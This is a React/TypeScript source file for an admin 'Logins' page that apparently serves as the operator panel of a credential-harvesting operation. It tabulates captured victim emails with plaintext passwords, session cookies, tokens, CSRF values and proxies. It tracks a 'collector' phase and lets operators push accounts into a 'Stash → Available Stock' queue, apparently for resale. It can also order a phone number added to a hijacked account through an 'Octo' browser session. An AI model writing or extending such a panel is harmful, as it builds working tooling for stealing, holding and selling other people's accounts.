import { useCallback, useEffect, useMemo, useState } from "react";
import { Navigate } from "react-router-dom";
import {
  api,
  collectorPhaseView,
  isActiveOperatorAlert,
  smsAddColumnLabel,
  type AppEvent,
} from "../api";
import { useAuth } from "../auth/AuthContext";
import { HideableEvent, pullFromEvent, statusMeta } from "../components/AccountFeed";
import { ConfirmModal } from "../components/ConfirmModal";
import { EventDetailModal } from "../components/EventDetailModal";
import { MailMxStatsBar } from "../components/MailMxStatsBar";
import { PaginationBar, usePagination } from "../components/Pagination";
import { useToast } from "../components/Toast";
import { useLiveEvents } from "../hooks/useLiveEvents";
import { useLocalEventsQuery } from "../hooks/localEventsStore";
import { relativeTime } from "../lib/utils";
import type { PullAccount } from "../api";
import { isElectronDesktop, mutateClearOperatorAlert, mutatePhoneAdd, mutateStock } from "../desktop";

function pullOf(ev: AppEvent): PullAccount | null {
  return pullFromEvent(ev);
}

function latestMessage(pull: PullAccount | null): string {
  const events = pull?.events;
  if (!events?.length) return "—";
  const last = events[events.length - 1];
  return last?.message || last?.type || "—";
}

function collectorLabel(pull: PullAccount | null): string {
  return pull?.collectorStatus || latestMessage(pull);
}

function phaseLabel(ev: AppEvent, pull: PullAccount | null): string {
  return collectorPhaseView(ev, pull).label;
}

function yesNo(v: unknown): string {
  if (typeof v === "string") return v.trim() ? "yes" : "—";
  return v ? "yes" : "—";
}

const LOGINS_OPTS = { limit: 2000, includeHidden: false } as const;

export function LoginsPage() {
  const { user, setAssignedKeys } = useAuth();
  const { push } = useToast();
  const [selected, setSelected] = useState<AppEvent | null>(null);
  const [filter, setFilter] = useState("");
  const [includeReady, setIncludeReady] = useState(false);
  const [httpSeed, setHttpSeed] = useState<AppEvent[]>([]);
  const [seedError, setSeedError] = useState<string | null>(null);
  const [clearingId, setClearingId] = useState<number | null>(null);
  const [stashingId, setStashingId] = useState<number | null>(null);
  const [pendingAction, setPendingAction] = useState<{
    ev: AppEvent;
    kind: "stash" | "alert" | "phoneYes" | "phoneNo";
  } | null>(null);
  const desktop = isElectronDesktop();
  const isAdmin = user?.role === "admin";
  const [alertClock, setAlertClock] = useState(() => Date.now());
  useEffect(() => {
    const id = window.setInterval(() => setAlertClock(Date.now()), 15_000);
    return () => window.clearInterval(id);
  }, []);

  const onAssignment = useCallback(
    (info: {
      resourceKey: string;
      message: string;
      assignedKeys: string[];
      events: AppEvent[];
    }) => {
      setAssignedKeys(info.assignedKeys);
      push(info.message, "ok");
    },
    [push, setAssignedKeys]
  );

  const onUnassignment = useCallback(
    (info: { resourceKey: string; message: string; assignedKeys: string[] }) => {
      setAssignedKeys(info.assignedKeys);
      push(info.message, "info");
    },
    [push, setAssignedKeys]
  );

  const { status, events: liveEvents, error: liveError } = useLiveEvents({
    enabled: Boolean(user) && isAdmin,
    onAssignment,
    onUnassignment,
  });
  const meta = statusMeta(status);

  const { events: localSeed } = useLocalEventsQuery(
    LOGINS_OPTS,
    Boolean(desktop && isAdmin)
  );

  useEffect(() => {
    if (!isAdmin || desktop) return;
    let cancelled = false;
    void api<{ logins: AppEvent[] }>("/api/data/logins?limit=500")
      .then((data) => {
        if (!cancelled) {
          setHttpSeed(data.logins || []);
          setSeedError(null);
        }
      })
      .catch((err) => {
        if (!cancelled) {
          setSeedError(err instanceof Error ? err.message : "Failed to load logins");
        }
      });
    return () => {
      cancelled = true;
    };
  }, [isAdmin, desktop]);

  const seed = desktop ? localSeed : httpSeed;

  const merged = useMemo(() => {
    const map = new Map<number, AppEvent>();
    for (const e of seed) map.set(e.id, e);
    for (const e of liveEvents) map.set(e.id, e);
    return [...map.values()];
  }, [seed, liveEvents]);

  const rows = useMemo(() => {
    const q = filter.trim().toLowerCase();
    return merged
      .filter((e) => {
        if (e.status === "ready") return includeReady;
        return true;
      })
      .filter((e) => {
        if (!q) return true;
        const pull = pullOf(e);
        const hay = [
          e.externalId,
          e.resourceKey,
          pull?.email,
          pull?.visitorId,
          pull?.id,
          latestMessage(pull),
          phaseLabel(e, pull),
          pull?.collectorStatus,
          pull?.phone,
          e.status,
        ]
          .filter(Boolean)
          .join(" ")
          .toLowerCase();
        return hay.includes(q);
      })
      .sort(
        (a, b) =>
          Date.parse(b.updatedAt) - Date.parse(a.updatedAt) || b.id - a.id
      );
  }, [merged, filter, includeReady, alertClock]);

  const {
    page,
    setPage,
    pageCount,
    pageSize,
    total,
    slice: pageRows,
  } = usePagination(rows, 50, `${filter}|${includeReady}`);

  const selectedLive = selected
    ? merged.find((e) => e.id === selected.id) || selected
    : null;

  if (user && user.role !== "admin") return <Navigate to="/" replace />;

  return (
    <div className="page page-wide page-fill">
      <header className="page-header">
        <h1>Logins</h1>
        <div className="page-header-actions">
          <input
            className="search header-search"
            placeholder="Filter email, visitor, phase…"
            value={filter}
            onChange={(e) => setFilter(e.target.value)}
          />
          <label className="checkbox-inline muted tiny">
            <input
              type="checkbox"
              checked={includeReady}
              onChange={(e) => setIncludeReady(e.target.checked)}
            />
            Include ready
          </label>
          <span className={`status-chip ${meta.className}`}>
            <span className="status-dot" />
            {meta.label}
          </span>
        </div>
      </header>

      <MailMxStatsBar />

      {(seedError || liveError) && (
        <div className="banner error">{seedError || liveError}</div>
      )}

      <div className="surface logins-table-wrap">
        <table className="logins-table">
          <thead>
            <tr>
              <th>Updated</th>
              <th>Email</th>
              <th>Phase</th>
              <th>Pass</th>
              <th>Cookies</th>
              <th>Token</th>
              <th>CSRF</th>
              <th>Proxy</th>
              <th>Collector</th>
              <th>SMS add</th>
              <th>Status</th>
            </tr>
          </thead>
          <tbody>
            {total === 0 && (
              <tr>
                <td colSpan={11} className="muted">
                  No login sessions yet.
                </td>
              </tr>
            )}
            {pageRows.map((ev) => {
              const pull = pullOf(ev);
              const email = pull?.email || (pull?.visitorId ? "Visitor" : "—");
              const phase = collectorPhaseView(ev, pull);
              return (
                <HideableEvent key={ev.id} ev={ev} isAdmin>
                  <tr
                    className={`logins-row status-${ev.status}${pull?.token ? "" : " is-partial"}${
                      isActiveOperatorAlert(pull?.operatorAlert) ? " is-urgent" : ""
                    }`}
                    onClick={() => setSelected(ev)}
                  >
                    <td
                      className="mono tiny"
                      title={new Date(ev.updatedAt).toLocaleString()}
                    >
                      {relativeTime(ev.updatedAt)}
                    </td>
                    <td className="truncate" title={email}>
                      {email}
                    </td>
                    <td>
                      <span className={`type-pill type-collector type-${phase.kind}`}>
                        {phase.label}
                      </span>
                    </td>
                    <td className="mono tiny truncate col-pass" title={pull?.password || undefined}>
                      {pull?.password || "—"}
                    </td>
                    <td className="mono tiny">{yesNo(pull?.cookies)}</td>
                    <td className="mono tiny">{yesNo(pull?.token)}</td>
                    <td className="mono tiny">{yesNo(pull?.csrf)}</td>
                    <td className="mono tiny">{yesNo(pull?.proxy)}</td>
                    <td className="truncate muted tiny" title={collectorLabel(pull)}>
                      {collectorLabel(pull)}
                    </td>
                    <td className="truncate muted tiny" title={smsAddColumnLabel(pull)}>
                      {smsAddColumnLabel(pull)}
                    </td>
                    <td className="tiny logins-row-status">
                      <span>{ev.status}</span>
                      {((ev.stockStage || "none") === "none" ||
                        ev.stockStage === "non_stash") && (
                        <button
                          type="button"
                          className="btn ghost compact"
                          disabled={stashingId === ev.id}
                          title="Put this login in Stash → Available Stock (Pending)"
                          onClick={(e) => {
                            e.stopPropagation();
                            setPendingAction({ ev, kind: "stash" });
                          }}
                        >
                          {stashingId === ev.id ? "Sending…" : "To stash"}
                        </button>
                      )}
                      {isActiveOperatorAlert(pull?.operatorAlert) && pull?.operatorAlert?.type === "phone_add_choice" && (
                        <>
                          <button
                            type="button"
                            className="btn ghost compact"
                            disabled={clearingId === ev.id}
                            onClick={(e) => {
                              e.stopPropagation();
                              setPendingAction({ ev, kind: "phoneYes" });
                            }}
                          >
                            Yes, add
                          </button>
                          <button
                            type="button"
                            className="btn ghost compact"
                            disabled={clearingId === ev.id}
                            onClick={(e) => {
                              e.stopPropagation();
                              setPendingAction({ ev, kind: "phoneNo" });
                            }}
                          >
                            No
                          </button>
                        </>
                      )}
                      {isActiveOperatorAlert(pull?.operatorAlert) &&
                        pull?.operatorAlert?.type !== "phone_add_choice" && (
                        <button
                          type="button"
                          className="btn ghost compact"
                          disabled={clearingId === ev.id}
                          onClick={(e) => {
                            e.stopPropagation();
                            setPendingAction({ ev, kind: "alert" });
                          }}
                        >
                          {clearingId === ev.id ? "Clearing…" : "Clear alert"}
                        </button>
                      )}
                    </td>
                  </tr>
                </HideableEvent>
              );
            })}
          </tbody>
        </table>
        <PaginationBar
          page={page}
          pageCount={pageCount}
          total={total}
          pageSize={pageSize}
          onPageChange={setPage}
          className="pagination-bar-table"
        />
      </div>

      {pendingAction && (
        <ConfirmModal
          title={
            pendingAction.kind === "stash"
              ? "Send to Stash?"
              : pendingAction.kind === "phoneYes"
                ? "Add a phone number?"
                : pendingAction.kind === "phoneNo"
                  ? "Skip phone update?"
                  : "Clear operator alert?"
          }
          body={
            pendingAction.kind === "stash" ? (
              <p>
                Send{" "}
                <strong>
                  {pullOf(pendingAction.ev)?.email || pendingAction.ev.externalId}
                </strong>{" "}
                to Stash → Available Stock (Pending)?
              </p>
            ) : pendingAction.kind === "phoneYes" ? (
              <p>
                Tell the collector to add a phone number on{" "}
                <strong>
                  {pullOf(pendingAction.ev)?.email || pendingAction.ev.externalId}
                </strong>
                ? Octo stays open until you close it.
              </p>
            ) : pendingAction.kind === "phoneNo" ? (
              <p>
                Skip the phone update on{" "}
                <strong>
                  {pullOf(pendingAction.ev)?.email || pendingAction.ev.externalId}
                </strong>
                ? The Octo window will close.
              </p>
            ) : (
              <p>
                Clear the operator alert on{" "}
                <strong>
                  {pullOf(pendingAction.ev)?.email || pendingAction.ev.externalId}
                </strong>
                ?
              </p>
            )
          }
          confirmLabel={
            pendingAction.kind === "stash"
              ? "Send to Stash"
              : pendingAction.kind === "phoneYes"
                ? "Yes, add phone"
                : pendingAction.kind === "phoneNo"
                  ? "No, skip"
                  : "Clear alert"
          }
          danger={pendingAction.kind === "phoneNo"}
          busy={stashingId != null || clearingId != null}
          onCancel={() =>
            stashingId == null && clearingId == null && setPendingAction(null)
          }
          onConfirm={() => {
            const { ev, kind } = pendingAction;
            if (kind === "stash") {
              setStashingId(ev.id);
              void mutateStock(ev.id, {
                stage: "pending",
                channel: "admin_user",
              })
                .then(() =>
                  push("Sent to Stash → Available Stock (Pending)", "ok")
                )
                .catch((err) =>
                  push(
                    err instanceof Error ? err.message : "Failed to send to stash",
                    "error"
                  )
                )
                .finally(() => {
                  setStashingId(null);
                  setPendingAction(null);
                });
              return;
            }
            if (kind === "phoneYes" || kind === "phoneNo") {
              setClearingId(ev.id);
              void mutatePhoneAdd(
                ev.id,
                kind === "phoneYes" ? "yes" : "no",
                pullOf(ev)?.visitorId || ev.resourceKey || pullOf(ev)?.email
              )
                .then(() =>
                  push(
                    kind === "phoneYes"
                      ? "Yes — collector will add a phone number"
                      : "No — collector will skip phone add",
                    "ok"
                  )
                )
                .catch((err) =>
                  push(
                    err instanceof Error ? err.message : "Failed to send phone-add choice",
                    "error"
                  )
                )
                .finally(() => {
                  setClearingId(null);
                  setPendingAction(null);
                });
              return;
            }
            setClearingId(ev.id);
            void mutateClearOperatorAlert(
              ev.id,
              pullOf(ev)?.visitorId || ev.resourceKey || pullOf(ev)?.email
            )
              .then(() => push("Cleared operator alert", "ok"))
              .catch((err) =>
                push(
                  err instanceof Error
                    ? err.message
                    : "Failed to clear operator alert",
                  "error"
                )
              )
              .finally(() => {
                setClearingId(null);
                setPendingAction(null);
              });
          }}
        />
      )}

      {selectedLive && (
        <EventDetailModal event={selectedLive} onClose={() => setSelected(null)} />
      )}
    </div>
  );
}
